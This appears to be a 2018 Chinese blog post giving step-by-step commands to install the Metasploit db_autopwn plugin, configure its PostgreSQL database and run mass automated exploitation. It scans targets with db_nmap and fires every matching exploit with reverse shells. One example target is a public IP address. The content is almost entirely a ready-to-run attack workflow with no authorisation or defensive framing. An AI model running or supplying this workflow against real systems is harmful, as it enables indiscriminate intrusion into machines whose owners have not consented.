Metasploit自动攻击模块

Metasploit自动攻击模块

Usage: db_autopwn [options]
    -h          Display this help text
    -t          Show all matching exploit modules
    -x          Select modules based on vulnerability references
    -p          Select modules based on open ports
    -e          Launch exploits against all matched targets
    -r          Use a reverse connect shell
    -b          Use a bind shell on a random port (default)
    -q          Disable exploit module output
    -R  [rank]  Only run modules with a minimal rank
    -I  [range] Only exploit hosts inside this range
    -X  [range] Always exclude hosts inside this range
    -PI [range] Only exploit hosts with these ports open
    -PX [range] Always exclude hosts with these ports open
    -m  [regex] Only run modules whose name matches the regex
    -T  [secs]  Maximum runtime for any exploit in seconds



wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb
mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
ls -alh /usr/share/metasploit-framework/plugins/

db_status
db_disconnect
db_status
db_connect msf3:msf3@127.0.0.1/msf3
db_status

workspace
workspace -a test1
workspace
workspace test1

db_nmap -sV -O -v -T 5 202.193.58.13
hosts
services

load db_autopwn
help db_autopwn
db_autopwn -e -t -r -p

 

环境:kali-linux-2017.3-vm-amd64

一、安装postgresql数据库

apt-get install postgresql

apt-get install rubygems libpq-dev

apt-get install libreadline-dev

apt-get install libssl-dev

apt-get install libpq5

apt-get install ruby-dev

apt-get install libpq-dev

直接全部copy到kali中执行即可

二、自动配置数据库

service postgres start           启动服务

msfdb init                           自动创建数据库、用户、密码

 

三、手动配置数据库

passwd postgres 修改postgresql数据库密码

 

su postgres    进入数据库

createuser hello –P       创建用户hello,并设置密码

createdb --owner=hello db_hello      给用户hello创建一个数据库db_hello

psql db_hello        进入db_hello数据库

 

四、安装db_autopwn.rb模块

cd /usr/share/metasploit-framework/plugins   定位到msf插件目录

git clone https://github.com/hahwul/metasploit-db_autopwn.git  安装db_autopwn

 

cd metasploit-db_autopwn

mv db_autopwn.rb /usr/share/metasploit-framework/plugins

打开msfconsole,查看db_autopwn是否安装成功,执行如下命令:

load db_autopwn         出现下图结果说明安装成功

 

五、借助db_autopwn进行自动加载模块进行攻击

msfconsole

use auxiliary/scanner/portscan/tcp     调用tcp扫描模块

set rhosts 192.168.1.28

set threads 10

exploit

 

自动加载模块

db_autopwn –t –p –r –e

 

 

posted @ 2018-02-16 14:48  lsgxeva  阅读(1016)  评论(0编辑  收藏  举报